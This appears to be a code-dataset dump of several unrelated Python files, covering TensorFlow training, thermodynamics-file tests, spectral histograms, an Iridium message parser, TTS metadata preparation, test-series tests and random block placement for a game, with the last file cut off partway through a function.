text
stringlengths
957
885k
from pathlib import Path from skimage import io import tensorflow as tf from datetime import datetime from tqdm import tqdm from dataset.datasetbase import DatasetBase from models.base import Model import numpy as np import logging def get_num_of_parameters(): total_parameters = 0 for variable in tf.trainable_variables(): shape = variable.get_shape() variable_parameters = 1 for dim in shape: variable_parameters *= dim.value total_parameters += variable_parameters return total_parameters def fit(model: Model, dataset: DatasetBase, save_path: Path, save_interval_minute: int = 15, epochs: int = 1): save_path = save_path.expanduser().absolute() model.build_graph() train = True test = not train switch = True sum_loss = 0 sum_acc = 0 saver = tf.train.Saver(save_relative_paths=True) epoch = -1 now = datetime.now().minute logging.info(f"Number of trainable parameters: {get_num_of_parameters()}") with tf.Session() as sess, tqdm() as progress: sess.run(tf.global_variables_initializer()) sum_writer = tf.summary.FileWriter(save_path / str(model) / "logdir", sess.graph) while epoch <= epochs: # Switch to test or train dataset if switch: switch = False if train: sess.run(dataset.train_init_op) progress.total = dataset.train_size epoch += 1 elif test: sess.run(dataset.test_init_op) progress.total = dataset.test_size try: phase = 'train' if train else 'test' loss = 0 acc = 0 if phase == 'train': loss, acc, _, = sess.run([model.loss(), model.accuracy(), model.optimize()], feed_dict={tf.keras.backend.learning_phase(): 1}) elif phase == 'test': loss, acc = sess.run([model.loss(), model.accuracy()], feed_dict={tf.keras.backend.learning_phase(): 0}) sum_loss += loss sum_acc += acc batches = (progress.n / dataset.batch_size + 1) desc = f"Epoch: {epoch:<5}| Phase: {phase :<10}| " \ f"loss: {sum_loss / batches :<25}| " \ f"acc: {sum_acc / batches :<25}| " progress.set_description(desc=desc) progress.update(dataset.batch_size) except tf.errors.OutOfRangeError: progress.write("") train = not train test = not test switch = True progress.n = 0 sum_loss = 0 sum_acc = 0 if now - datetime.now().minute >= save_interval_minute: now = datetime.now().minute saver.save(sess, str(save_path / str(model) / str(model))) sum_writer.flush() sum_writer.close() sum_writer.reopen() continue sum_writer.flush() sum_writer.close() saver.save(sess, str(save_path / str(model) / str(model))) def predict(model: Model, dataset: DatasetBase, restore_path: Path): restore_path = restore_path.expanduser().absolute() model.build_graph() saver = tf.train.Saver(save_relative_paths=True) with tf.Session() as sess: sess.run(tf.global_variables_initializer()) saver.restore(sess, str(restore_path)) while True: sess.run(dataset.test_init_op) try: pred, x, y = sess.run([model.predict(), dataset.x, dataset.y], feed_dict={tf.keras.backend.learning_phase(): 0}) pred = np.argmax(pred) print(pred) io.imshow(x[0, :, :, 0], cmap="gray") io.show() except tf.errors.OutOfRangeError: continue
<gh_stars>10-100 # -*- coding: utf-8 -*- """ Tests for pmutt.io.thermdat module Created on Fri Jul 7 12:31:00 2018 """ import unittest import pmutt.io.thermdat as thermdat import numpy as np class TestThermdat(unittest.TestCase): def test__get_fields(self): lines = [ ' test 200 ## %^& test100', 'test 200 ## %^& test100 ', 'test 200 ## %^& test100 \n', '\n test 200 ## %^& test100', '\n test 200 ## %^& test100 \n' ] # Default delimiter and remove fields expected_fields = ['test', '200', '##', '%^&', 'test100'] for line in lines: self.assertListEqual(thermdat._get_fields(line), expected_fields) # Changed delimiter to '#' expected_fields = ['test200', '%^&test100'] for line in lines: self.assertListEqual( thermdat._get_fields(line, delimiter='#', remove_fields=['', '\n', ' ']), expected_fields) # Added 'test' to remove_fields expected_fields = ['200', '##', '%^&', '100'] for line in lines: self.assertListEqual( thermdat._get_fields(line, remove_fields=['', '\n', 'test']), expected_fields) def test__is_temperature_header(self): false_lines = [ 'THERMO ALL', 'H2O H 2O 1 G200.0 1100.0 493.9 1', ' 3.65264072E+00 1.06108515E-03 3.83455580E-08 3.84923664E-10-2.13953966E-13 2', '-3.02204928E+04 1.60236266E+00 3.99524709E+00 5.18551442E-04-5.53026360E-06 3', ' 1.85895538E-08-1.55138452E-11-3.02807840E+04-7.89384507E-02 4', '100 200 300 400' ] for line in false_lines: self.assertFalse(thermdat._is_temperature_header(line)) true_lines = [ ' 100 500 1500 \n', '100 500 1500\n', '100 500 1500 \n ' ] for line in true_lines: self.assertTrue(thermdat._is_temperature_header(line)) def test__read_line_num(self): lines = [ 'a b c d 1\n', 'a 2 \n', 'a c 3 ', ' 4' ] expected_values = [1, 2, 3, 4] for line, expected_value in zip(lines, expected_values): self.assertEqual(thermdat._read_line_num(line), expected_value) with self.assertRaises(ValueError): thermdat._read_line_num('line ending with letter') def test__read_line1(self): lines = [ 'H2 H 2 G200.0 1100.0 493.9 1', 'H2O H 2O 1 G200.0 1100.0 493.9 1', 'CH3OH H 4O 1C 1 G200.0 1100.0 493.9 1', 'Oxazirene H 1O 1C 1N 1L200.0 1100.0 493.9 1', 'Pt(B) bulk species Pt 1 S200.0 1100.0 493.9 1' ] expected_values = [{ 'name': 'H2', 'elements': { 'H': 2 }, 'phase': 'G', 'T_low': 200., 'T_high': 1100., 'T_mid': 493.9, }, { 'name': 'H2O', 'elements': { 'H': 2, 'O': 1 }, 'phase': 'G', 'T_low': 200., 'T_high': 1100., 'T_mid': 493.9, }, { 'name': 'CH3OH', 'elements': { 'H': 4, 'O': 1, 'C': 1 }, 'phase': 'G', 'T_low': 200., 'T_high': 1100., 'T_mid': 493.9, }, { 'name': 'Oxazirene', 'elements': { 'H': 1, 'O': 1, 'C': 1, 'N': 1 }, 'phase': 'L', 'T_low': 200., 'T_high': 1100., 'T_mid': 493.9, }, { 'name': 'Pt(B)', 'elements': { 'Pt': 1 }, 'phase': 'S', 'T_low': 200., 'T_high': 1100., 'T_mid': 493.9, 'notes': 'bulk species' }] for line, expected_value in zip(lines, expected_values): self.assertDictEqual(thermdat._read_line1(line), expected_value) def test__read_line2(self): lines = [ ' 3.65264072E+00 1.06108515E-03 3.83455580E-08 3.84923664E-10-2.13953966E-13 2', ' 3.652641E+00 1.061085E-03 3.834556E-08 3.849237E-10 -2.139540E-13 2' ] expected_values = [ np.array([ 3.65264072E+00, 1.06108515E-03, 3.83455580E-08, 3.84923664E-10, -2.13953966E-13, 0., 0. ]), np.array([ 3.652641E+00, 1.061085E-03, 3.834556E-08, 3.849237E-10, -2.139540E-13, 0., 0. ]) ] for line, expected_value in zip(lines, expected_values): data = thermdat._read_line2(line, nasa_data={}) np.testing.assert_allclose(data['a_high'], expected_value) def test__read_line3(self): lines = [ ' 3.65264072E+00 1.06108515E-03 3.83455580E-08 3.84923664E-10-2.13953966E-13 3', ' 3.652641E+00 1.061085E-03 3.834556E-08 3.849237E-10 -2.139540E-13 3' ] expected_a_high_values = [ np.array([0., 0., 0., 0., 0., 3.65264072E+00, 1.06108515E-03]), np.array([0., 0., 0., 0., 0., 3.652641E+00, 1.061085E-03]) ] expected_a_low_values = [ np.array([ 3.83455580E-08, 3.84923664E-10, -2.13953966E-13, 0., 0., 0., 0. ]), np.array( [3.834556E-08, 3.849237E-10, -2.139540E-13, 0., 0., 0., 0.]) ] for line, expected_a_high_value, expected_a_low_value in zip( lines, expected_a_high_values, expected_a_low_values): data = thermdat._read_line3(line, nasa_data={'a_high': np.zeros(7)}) np.testing.assert_allclose(data['a_high'], expected_a_high_value) np.testing.assert_allclose(data['a_low'], expected_a_low_value) def test__read_line4(self): lines = [ ' 3.65264072E+00 1.06108515E-03 3.83455580E-08 3.84923664E-10 4', ' 3.652641E+00 1.061085E-03 3.834556E-08 3.849237E-10 4' ] expected_values = [ np.array([ 0., 0., 0., 3.65264072E+00, 1.06108515E-03, 3.83455580E-08, 3.84923664E-10 ]), np.array([ 0., 0., 0., 3.652641E+00, 1.061085E-03, 3.834556E-08, 3.849237E-10 ]) ] for line, expected_value in zip(lines, expected_values): data = thermdat._read_line4(line, nasa_data={'a_low': np.zeros(7)}) np.testing.assert_allclose(data['a_low'], expected_value) if __name__ == '__main__': unittest.main()
<reponame>nfahlgren/hsi_toolkit_py #function [SpecDist] = PlotSpectraDistribution(Spectra, WaveLengths,SampStuff, FigNum); ### ###################################################################### ### A FUNCTION THAT CREATES & DISPLAYS SPECTRA AS A 2D HISTOGRAM ### ### SPECTRA ARE ASSUMED REFLECTANCES OR EMISSIVITIES IN [0,1] ### ### SPECTRA ARE MAPPED TO INTEGERS BETWEEN 0 AND 100 (OR < 100) ### ###################################################################### ### ### INPUTS: ### I1. Spectra IS A NUMBER SPECTRA x NUMBER BANDS... ### ### ...ARRAY OF REFLECTANCES OR EMISSIVITIES ### ### I2. WaveLengths IS A VECTOR OF THE SPECTRAL WAVELENGTHS ### ### I3. SampStuff IS A VECTOR CONTAINING ### ### SampInt: FRACTIONAL SIZE OF HISTOGRAM BINS ### ### IntSampInt: INT VERSION OF SampInt ### ### IntTopReflect: INT VALUE OF MAX REF/EMIS BIN ### ### I4. FigNum IS THE INDEX OF THE FIGURE TO USE FOR DISPLAY ### ### IF FigNum < 1, DO NOT DISPLAY ANYTHING ### ### ### OUTPUTS: ### O1. SpecDist IS THE 2D HISTOGRAM ### ################################################################## ### ### ### MATLAB AUTHOR: <NAME> ### ### PYTHON AUTHOR: <NAME> ### ### LAST UPDATE: 021519 ### ### ### ################################################################## def PlotSpectraDistribution(Spectra, WaveLengths, SampStuff, FigNum): import numpy as np from scipy import signal import cv2 import matplotlib.pyplot as plt from mpl_toolkits.mplot3d import Axes3D from matplotlib import cm ## ### INITIALIZE PARAMETERS ### SampInt = SampStuff[0] IntSampInt = SampStuff[1] IntTopReflect = SampStuff[2] SMOOTHSIZE = [3,3] NumWave = np.size(Spectra, 1) SpecDist = np.zeros((IntTopReflect, NumWave)) assert NumWave == np.size(WaveLengths), 'Wavelength sizes don''t match' ### MAP SPECTRA TO [0, 100] ### MappedSpectra = np.minimum(100, (Spectra*99)+1) MappedSpectra = np.maximum(1, np.round(MappedSpectra/SampInt)*SampInt) ## ### MAKE A HISTOGRAM FOR EACH WAVELENGTH ### for k in range(NumWave): SpecDist[:, k] = np.histogram(MappedSpectra[:, k], np.arange(0, IntTopReflect+IntSampInt, IntSampInt))[0] ### SMOOTH BY TAKING A LOCAL MAX FOLLOWED BY A LOCAL AVERAGE ### SpecDist = cv2.dilate(SpecDist, np.ones((3,3)), iterations=1) SpecDist = signal.convolve2d(SpecDist, (1/np.prod(SMOOTHSIZE))*np.ones(SMOOTHSIZE), 'same') ## ### DISPLAY AS MESH ### if(FigNum > 0): XAxis = WaveLengths; YAxis = np.arange(0, IntTopReflect, IntSampInt).T X, Y = np.meshgrid(XAxis, YAxis) fig = plt.figure(FigNum) ax = fig.gca(projection='3d') surf = ax.plot_surface(X, Y, SpecDist, cmap=cm.coolwarm, linewidth=0, antialiased=False) fig.colorbar(surf, shrink=0.5, aspect=5) plt.title('Spectra Histogram') plt.xlabel('Wavelength (nm)') plt.ylabel('Reflectance') plt.show() ### END OF FUNCTION ### #######################
import typing import struct from .basic import Message _IE_HEADER_STRUCT = struct.Struct(">BH") """ Структура заголовка IEI""" _MESSAGE_HEADER_STRUCT = struct.Struct(">BH") """ Структура заголовка сообщения """ _PROTOCOL_VERSION = 1 """ Идентификатор протокола иридиума """ class MessageParser: """ Парсилка сообщений от иридиума Довольно глупая и ожидает только один тип входящих сообщений """ IE_HEADER_STRUCT = _IE_HEADER_STRUCT """ Структура заголовка IEI""" MESSAGE_HEADER_STRUCT = _MESSAGE_HEADER_STRUCT """ Структура заголовка сообщения """ PROTOCOL_VERSION = _PROTOCOL_VERSION """ Идентификатор протокола иридиума """ def __init__(self, expected_message_class: typing.Type[Message]): self.msg_class = expected_message_class # Соберем себе словарик ожидаемых элементов из сообщения self._allowed_elemenents = {} for elem_class in self.msg_class.IE_CLASSES: self._allowed_elemenents[elem_class.IEI] = elem_class def parse(self, raw_data: bytes)->Message: retval = self.msg_class() msg_payload = self._msg_slice(raw_data) for iei, ie_payload in self._ie_iter(msg_payload): ie_class = self._allowed_elemenents[iei] ie = ie_class() ie.unpack(ie_payload) retval.insert_ie(ie) return retval # ============================== # Служебные методы для парсинга # ============================== def _ie_slice(self, data: bytes): """ Выпаршивает первый IE из массива байт """ header_size = self.IE_HEADER_STRUCT.size header, headless = data[0:header_size], data[header_size:] iei, size = self.IE_HEADER_STRUCT.unpack(header) ie_payload, leftovers = headless[:size], headless[size:] if len(ie_payload) != size: raise ValueError( "invalid size for iei %s: %s while %s were expected" % (iei, len(ie_payload), size,) ) return iei, ie_payload, leftovers def _ie_iter(self, data: bytes): """ Парсинг самого верхнего уровня для информационных элементов Функция разделяет поток байтов на информационные элементы Работает как генератор. йилдит кортежи ie-id, ie-payload """ while len(data) != 0: iei, ie_payload, leftovers = self._ie_slice(data) yield iei, ie_payload data = leftovers def _msg_slice(self, data: bytes): """ Режет сообщение на заголовок и "нагрузку" """ header_size = self.MESSAGE_HEADER_STRUCT.size header, msg_payload = data[0:header_size], data[header_size:] protocol_version, size = self.MESSAGE_HEADER_STRUCT.unpack(header) if protocol_version != self.PROTOCOL_VERSION: raise ValueError( "Invalid protocol version: %s, %s were expected" % (protocol_version. self.PROTOCOL_VERSION,) ) if size != len(msg_payload): raise ValueError( "Invalid message size %d. %d were expected" % (len(msg_payload), size,) ) return msg_payload class MessageSerializer: """ Сериализатор SBD сообщений с нашей стороны """ IE_HEADER_STRUCT = _IE_HEADER_STRUCT """ Структура заголовка IEI""" MESSAGE_HEADER_STRUCT = _MESSAGE_HEADER_STRUCT """ Структура заголовка сообщения """ PROTOCOL_VERSION = _PROTOCOL_VERSION """ Идентификатор протокола иридиума """ def serialize(self, msg: Message)->bytes: msg_payload = bytes() for iei, ie in msg.ies.items(): msg_payload += self._ie_join(iei, ie.pack()) msg_data = self._msg_join(msg_payload) return msg_data # noinspection PyMethodMayBeStatic def _ie_join(self, iei: int, ie_payload: bytes): """ Построение IE в бинарной форме из идентификатора и его тела """ size = len(ie_payload) data = _IE_HEADER_STRUCT.pack(iei, size) data += ie_payload return data def _msg_join(self, msg_payload: bytes): """ Режет сообщение на заголовок и "нагрузку" """ header = self.MESSAGE_HEADER_STRUCT.pack(self.PROTOCOL_VERSION, len(msg_payload)) return header + msg_payload
import os import sys import random import pinyin import jieba from xpinyin import Pinyin import re sys.path.insert(0, "../") lj_speech = [ ("data/css10", "metadata.txt") ] comvoi = [ ("data/comvoi_clean", "all.txt") ] css10 = [ ("data/css10", "train.txt"), ("data/css10", "val.txt"), ] slr = [ ("data/css10", "line_index_female_co.tsv"), ("data/css10", "line_index_male_co.tsv"), ("data/css10", "line_index_female_pe.tsv"), ("data/css10", "line_index_male_pe.tsv"), ("data/css10", "line_index_female_ve.tsv"), ("data/css10", "line_index_male_ve.tsv") ] zhtranscript = [ ("data/css10", "zhtranscript.txt") ] entranscript = [ ("data/css10", "entranscript.txt") ] #STCMDS = [ # ("data/css10", "STCMDStrans.txt") #] siwis = [ ("data/css10", "all_prompts_part1.txt"), ("data/css10", "all_prompts_part2.txt") ] metadata = [["data/css10", "train.txt", []], ["data/css10", "val.txt", []]] valid_lang = ["chinese", "english", "spanish", "french", "zh", "fr"] lang_to_id = {"chinese" : "zh", "english" : "en", "spanish" : "es", "french" : "fr"} id_to_lang = {"zh" : "chinese", "en" : "english", "es" : "spanish", "fr" : "french"} for d, fs in css10: cntr = 0 with open(os.path.join(d, fs), 'r', encoding='utf-8') as f: for line in f: info = line.rstrip().split('|') idnum, speaker, language, wavpath, _, _, transcript, _ = info if info[2] in valid_lang: cntr += 1 info[2] = lang_to_id[info[2]] info[1] = "000-" + info[2] if fs == "train.txt": metadata[0][2].append(info) else: metadata[1][2].append(info) for d, fs in lj_speech: with open(os.path.join(d, fs), 'r', encoding='utf-8') as f: cntr = 0 for line in f: line = line.rstrip().split('|') new_stuff = ["0" + str(70000+cntr), "000-en", "en", "english/wavs/" + line[0] + ".wav", "", "", line[2], ""] cntr += 1 if(cntr % 192 == 0): metadata[1][2].append(new_stuff) else: metadata[0][2].append(new_stuff) for d, fs in comvoi: with open(os.path.join(d, fs), 'r', encoding='utf-8') as f: cntr = 0 for line in f: line = line.rstrip().split('|') if line[2] in id_to_lang: cntr += 1 line[3] = id_to_lang[line[2]] + "/" + line[3] new_stuff = [line[0], "0" + line[1] + "-" + line[2], line[2], line[3], "", "", line[4], ""] if(cntr % 100 == 0): metadata[1][2].append(new_stuff) else: metadata[0][2].append(new_stuff) part = 0 for d, fs in siwis: part += 1 with open(os.path.join(d, fs), 'r', encoding='utf-8') as f: cntr = 0 for line in f: line = line.rstrip().split('\t') cntr += 1 bad = '«»–' for char in bad: line[1] = line[1].replace(char, "") trans = line[1].strip() new_stuff = [0, "027-fr", "fr", "french/siwis/wavs/part" + str(part) + "/" + line[0].split('.')[0] + "r.wav", "", "", trans, ""] if (cntr % 100 == 0): metadata[1][2].append(new_stuff) else: metadata[0][2].append(new_stuff) en_speakers = {} speaker_id = 0 for d, fs in entranscript: with open(os.path.join(d,fs), 'r', encoding='utf-8') as f: cntr = 0 for line in f: cntr += 1 line = line.rstrip().split('|') speaker = line[0].split('_')[0] if speaker not in en_speakers: speaker_id += 1 en_speakers[speaker] = str(speaker_id).zfill(3) new_stuff = [0, en_speakers[speaker] + "-en", "en", "english/VCTK-Corpus/wavs/" + speaker + \ "/" + line[0].split('.')[0] + "r.wav", "", "", line[1], ""] if cntr % 50 == 0: metadata[1][2].append(new_stuff) else: metadata[0][2].append(new_stuff) zh_speakers = {} speaker_id = 7 py = Pinyin() for d, fs in zhtranscript: with open(os.path.join(d, fs), 'r', encoding='utf-8') as f: cntr = 0 for line in f: cntr += 1 line = line.rstrip().split('|') speaker = line[0].split('_')[0][1:] if speaker not in zh_speakers: speaker_id += 1 zh_speakers[speaker] = str(speaker_id).zfill(3) new_stuff = [0, zh_speakers[speaker] + "-zh", "zh", "chinese/data_thchs30/data" + "/" + line[0] + "r.wav", "", "", pinyin.get(line[1]) + "。", ""] if cntr % 30 == 0: metadata[1][2].append(new_stuff) else: metadata[0][2].append(new_stuff) # zh_speakers = {} # for d, fs in STCMDS: # with open(os.path.join(d, fs), 'r', encoding='utf-8') as f: # cntr = 0 # for line in f: # cntr += 1 # line = line.rstrip().split('|') # speaker = line[0][8:14] # if speaker not in zh_speakers: # speaker_id += 1 # zh_speakers[speaker] = str(speaker_id).zfill(3) # seglist = jieba.cut(line[1]) # trans = "" # for seg in seglist: # trans += pinyin.get(seg) # trans += " " # new_stuff = [0, zh_speakers[speaker] + "-zh", "zh", "chinese/STCMDS" + "/" + line[0] + "r.wav", "", "", trans[:-1] + "。", ""] # if cntr % 100 == 0: # metadata[1][2].append(new_stuff) # else: # metadata[0][2].append(new_stuff) slr_speakers = {} speaker_id = 0 country_to_slr = {"co" : "72", "pe" : "73", "ve": "75"} for d, fs in slr: cntr = 0 sorted_lines = [] gender = fs.split('_')[2] slrver = country_to_slr[fs.split('_')[3].split(".")[0]] with open(os.path.join(d, fs), 'r', encoding='utf-8') as f: for line in f: line = line.rstrip().split('\t') file_info = line[0].split('_') sorted_lines.append((file_info[0] + "_" + file_info[1], file_info[2], line[1].rstrip())) sorted_lines = sorted(sorted_lines, key=lambda line: line[0]) for line in sorted_lines: if line[0] not in slr_speakers: speaker_id += 1 slr_speakers[line[0]] = str(speaker_id).zfill(3) #print(slr_speakers[line[0] + line[1]] + '|' + line[0] + "_" + line[1] + "_" +line[2] + "|" + line[3]) cntr += 1 wav_path = "spanish/" + "slr" + slrver + "/wavs" + gender + "/" + line[0] + "_" + line[1] + "r.wav" new_stuff = [0, slr_speakers[line[0]] + "-es", "es", wav_path, "", "", line[2], ""] if cntr % 30 == 0: metadata[1][2].append(new_stuff) else: metadata[0][2].append(new_stuff) metadata[0][2].sort(key=lambda data: (data[2], data[1])) metadata[1][2].sort(key=lambda data: (data[2], data[1])) #random.shuffle(metadata[1][2]) cntr = 0 lang_max = {'zh' : 100000, 'fr': 200000, 'es': 200000, 'en': 200000} good_max = {'zh' : 100000, 'fr': 100000, 'es': 200000, 'en': 2500} for d, fs, m in metadata: valid_data = [] with open(os.path.join(d, "new"+fs), 'w', encoding='utf-8') as f: speaker_cnt = {} good_speakers = ['000-en', '000-fr', '027-fr', '000-es', '000-zh'] for i in m: idx, s, l, a, _, _, raw_text, ph = i if s not in speaker_cnt: speaker_cnt[s] = 0 if s in good_speakers: if speaker_cnt[s] < good_max[l]: speaker_cnt[s] += 1 print(f'{str(cntr).zfill(6)}|{s}|{l}|{a}|||{raw_text}|{ph}', file=f) else: if speaker_cnt[s] < lang_max[l]: speaker_cnt[s] += 1 print(f'{str(cntr).zfill(6)}|{s}|{l}|{a}|||{raw_text}|{ph}', file=f) # if(s[0:2] == '00' and cntr % 7 < 4 and l != 'zh' and l != 'en'): # print(f'{str(cntr).zfill(6)}|{s}|{l}|{a}|||{raw_text}|{ph}', file=f) # elif((s[0:2] != '00' and l != 'en') or (l == 'zh' and cntr % 7 < 5)): # print(f'{str(cntr).zfill(6)}|{s}|{l}|{a}|||{raw_text}|{ph}', file=f) # elif(l == 'en' and cntr % 7 < 4): # print(f'{str(cntr).zfill(6)}|{s}|{l}|{a}|||{raw_text}|{ph}', file=f) cntr += 1
import time import io from datetime import datetime import pavilion.series_util from pavilion import arguments from pavilion import commands from pavilion import plugins from pavilion import series from pavilion.unittest import PavTestCase class SeriesFileTests(PavTestCase): def setUp(self): plugins.initialize_plugins(self.pav_cfg) def tearDown(self): plugins._reset_plugins() def test_series_circle(self): """Test if it can detect circular references and that ordered: True works as intended.""" series_cmd = commands.get_command('series') arg_parser = arguments.get_parser() series_args = arg_parser.parse_args(['series', 'series_circle1']) self.assertRaises(pavilion.series_util.TestSeriesError, lambda: series_cmd.run(self.pav_cfg, series_args)) def test_series_simultaneous(self): """Tests to see if simultaneous: <num> works as intended. """ series_config = { 'series': {'only_set': {'modes': [], 'tests': ['echo_test.b'], 'only_if': {}, 'depends_on': [], 'not_if': {}} }, 'modes': ['smode2'], 'simultaneous': '1', 'restart': False, 'ordered': False, 'host': None } test_series_obj = series.TestSeries(self.pav_cfg, series_config=series_config) test_series_obj.create_set_graph() test_series_obj.run_series() # make sure test actually ends time.sleep(3) test_starts = [] for test_id, test_obj in test_series_obj.tests.items(): test_starts.append(test_obj.results['started']) timediff1 = test_starts[1] - test_starts[0] timediff2 = test_starts[2] - test_starts[1] self.assertGreaterEqual(timediff1, 0.5) self.assertGreaterEqual(timediff2, 0.5) def test_series_modes(self): """Test if modes and host are applied correctly.""" series_config = { 'series': {'only_set': {'modes': ['smode1'], 'depends_on': [], 'tests': ['echo_test.a'], 'only_if': {}, 'not_if': {}} }, 'modes': ['smode2'], 'simultaneous': None, 'ordered': False, 'restart': False, 'host': 'this' } outfile = io.StringIO() test_series_obj = series.TestSeries(self.pav_cfg, series_config=series_config, outfile=outfile, errfile=outfile) test_series_obj.create_set_graph() test_series_obj.run_series() # make sure test actually ends time.sleep(0.5) self.assertNotEqual(test_series_obj.tests, {}) for test_id, test_obj in test_series_obj.tests.items(): vars = test_obj.var_man.variable_sets['var'] a_num_value = vars.get('another_num', None, None) self.assertEqual(a_num_value, '13') asdf_value = vars.get('asdf', None, None) self.assertEqual(asdf_value, 'asdf1') hosty_value = vars.get('hosty', None, None) self.assertEqual(hosty_value, 'this') def test_series_depends(self): """Tests if dependencies work as intended.""" series_config = { 'series': {'set_d': {'modes': [], 'tests': ['echo_test.d'], 'depends_on': ['set_c'], 'depends_pass': 'True', 'only_if': {}, 'not_if': {}}, 'set_c': {'modes': [], 'tests': ['echo_test.c'], 'depends_on': [], 'only_if': {}, 'not_if': {} } }, 'modes': ['smode2'], 'simultaneous': None, 'ordered': False, 'restart': False, 'host': None } outfile = io.StringIO() test_series_obj = series.TestSeries(self.pav_cfg, series_config=series_config, outfile=outfile, errfile=outfile) test_series_obj.create_dependency_graph() test_series_obj.create_set_graph() test_series_obj.run_series() time.sleep(0.1) # check if echo_test.d is skipped for test_id, test_obj in test_series_obj.tests.items(): if test_obj.name == 'echo_test.d': self.assertTrue(test_obj.skipped) def test_series_conditionals(self): """Test if conditionals work as intended.""" # only_if, not_if series_config = { 'series': {'only_set': {'modes': ['smode1'], 'depends_on': [], 'tests': ['echo_test.wrong_year'], 'only_if': {}, 'not_if': {}} }, 'modes': ['smode2'], 'simultaneous': None, 'ordered': False, 'restart': False, 'host': None } outfile = io.StringIO() test_series_obj = series.TestSeries( self.pav_cfg, series_config=series_config, outfile=outfile, errfile=outfile) test_series_obj.create_set_graph() test_series_obj.run_series() time.sleep(0.1) self.assertEqual(len(list(test_series_obj.tests.keys())), 1) for test_id, test_obj in test_series_obj.tests.items(): self.assertIsNone(test_obj.results['result'])
<filename>app/api/random_positions.py import random def get_block_square_positions(currentlyoccupiedpositions): positions = [] square_orientation_dic = [ "UpperLeft", "UpperRight", "LowerLeft", "LowerRight" ] block_square_not_positioned = True list_of_block_square_indexes = [] while block_square_not_positioned: block_square_not_positioned = False square_orietation = random.choice(square_orientation_dic) print(square_orietation) index_to_start = random.randrange(63) print(index_to_start) intital_block_position = index_to_start currentIdx = intital_block_position if square_orietation == "UpperLeft": list_of_block_square_indexes.append(currentIdx) list_of_block_square_indexes.append(currentIdx-8) list_of_block_square_indexes.append(currentIdx-9) list_of_block_square_indexes.append(currentIdx-1) elif square_orietation == "UpperRight": list_of_block_square_indexes.append(currentIdx) list_of_block_square_indexes.append(currentIdx-8) list_of_block_square_indexes.append(currentIdx-7) list_of_block_square_indexes.append(currentIdx+1) elif square_orietation == 'LowerLeft': list_of_block_square_indexes.append(currentIdx) list_of_block_square_indexes.append(currentIdx+8) list_of_block_square_indexes.append(currentIdx+7) list_of_block_square_indexes.append(currentIdx-1) elif square_orietation == 'LowerRight': list_of_block_square_indexes.append(currentIdx) list_of_block_square_indexes.append(currentIdx+8) list_of_block_square_indexes.append(currentIdx+9) list_of_block_square_indexes.append(currentIdx+1) for i in list_of_block_square_indexes: if (i > 63) or (i < 0) or (i in currentlyoccupiedpositions): block_square_not_positioned = True if block_square_not_positioned: list_of_block_square_indexes = [] positions = list_of_block_square_indexes return positions def get_block_L_positions(): positions = [] l_orietation_dic = [ "DownDownLeft", "DownDownRight", "UpUpRight", "UpUpLeft", "LeftDownDown", "LeftUpUp", "RightDownDown", "RightUpUp", "UpLeftLeft", "UpRightRight", "DownRightRight", "DownLeftLeft", "LeftLeftUp", "RightRightUp", "RightRightDown", "LeftLeftDown" ] block_L_not_positioned = True list_of_block_L_indexes = [] while block_L_not_positioned: block_L_not_positioned = False l_orietation = random.choice(l_orietation_dic) print(l_orietation) index_to_start = random.randrange(63) print(index_to_start) intital_block_L_position = index_to_start currentIdx = intital_block_L_position if l_orietation == "DownDownLeft": list_of_block_L_indexes.append(currentIdx) list_of_block_L_indexes.append(currentIdx+8) currentIdx += 8 list_of_block_L_indexes.append(currentIdx+8) currentIdx += 8 list_of_block_L_indexes.append(currentIdx-1) elif l_orietation == "DownDownRight": list_of_block_L_indexes.append(currentIdx) list_of_block_L_indexes.append(currentIdx+8) currentIdx += 8 list_of_block_L_indexes.append(currentIdx+8) currentIdx += 8 list_of_block_L_indexes.append(currentIdx+1) elif l_orietation == "UpUpRight": list_of_block_L_indexes.append(currentIdx) list_of_block_L_indexes.append(currentIdx-8) currentIdx -= 8 list_of_block_L_indexes.append(currentIdx-8) currentIdx -= 8 list_of_block_L_indexes.append(currentIdx+1) elif l_orietation == "UpUpLeft": list_of_block_L_indexes.append(currentIdx) list_of_block_L_indexes.append(currentIdx-8) currentIdx -= 8 list_of_block_L_indexes.append(currentIdx-8) currentIdx -= 8 list_of_block_L_indexes.append(currentIdx-1) elif l_orietation == "LeftDownDown": list_of_block_L_indexes.append(currentIdx) list_of_block_L_indexes.append(currentIdx-1) currentIdx -= 1 list_of_block_L_indexes.append(currentIdx+8) currentIdx += 8 list_of_block_L_indexes.append(currentIdx+8) elif l_orietation == "LeftUpUp": list_of_block_L_indexes.append(currentIdx) list_of_block_L_indexes.append(currentIdx-1) currentIdx -= 1 list_of_block_L_indexes.append(currentIdx-8) currentIdx -= 8 list_of_block_L_indexes.append(currentIdx-8) elif l_orietation == "RightDownDown": list_of_block_L_indexes.append(currentIdx) list_of_block_L_indexes.append(currentIdx+1) currentIdx += 1 list_of_block_L_indexes.append(currentIdx+8) currentIdx += 8 list_of_block_L_indexes.append(currentIdx+8) elif l_orietation == "RightUpUp": list_of_block_L_indexes.append(currentIdx) list_of_block_L_indexes.append(currentIdx+1) currentIdx += 1 list_of_block_L_indexes.append(currentIdx-8) currentIdx -= 8 list_of_block_L_indexes.append(currentIdx-8) elif l_orietation == "UpLeftLeft": list_of_block_L_indexes.append(currentIdx) list_of_block_L_indexes.append(currentIdx-8) currentIdx -= 8 list_of_block_L_indexes.append(currentIdx-1) currentIdx -= 1 list_of_block_L_indexes.append(currentIdx-1) elif l_orietation == "UpRightRight": list_of_block_L_indexes.append(currentIdx) list_of_block_L_indexes.append(currentIdx-8) currentIdx -= 8 list_of_block_L_indexes.append(currentIdx+1) currentIdx += 1 list_of_block_L_indexes.append(currentIdx+1) elif l_orietation == "DownRightRight": list_of_block_L_indexes.append(currentIdx) list_of_block_L_indexes.append(currentIdx+8) currentIdx += 8 list_of_block_L_indexes.append(currentIdx+1) currentIdx += 1 list_of_block_L_indexes.append(currentIdx+1) elif l_orietation == "DownLeftLeft": list_of_block_L_indexes.append(currentIdx) list_of_block_L_indexes.append(currentIdx+8) currentIdx += 8 list_of_block_L_indexes.append(currentIdx-1) currentIdx -= 1 list_of_block_L_indexes.append(currentIdx-1) elif l_orietation == "LeftLeftUp": list_of_block_L_indexes.append(currentIdx) list_of_block_L_indexes.append(currentIdx-1) currentIdx -= 1 list_of_block_L_indexes.append(currentIdx-1) currentIdx -= 1 list_of_block_L_indexes.append(currentIdx-8) elif l_orietation == "RightRightUp": list_of_block_L_indexes.append(currentIdx) list_of_block_L_indexes.append(currentIdx+1) currentIdx += 1 list_of_block_L_indexes.append(currentIdx+1) currentIdx += 1 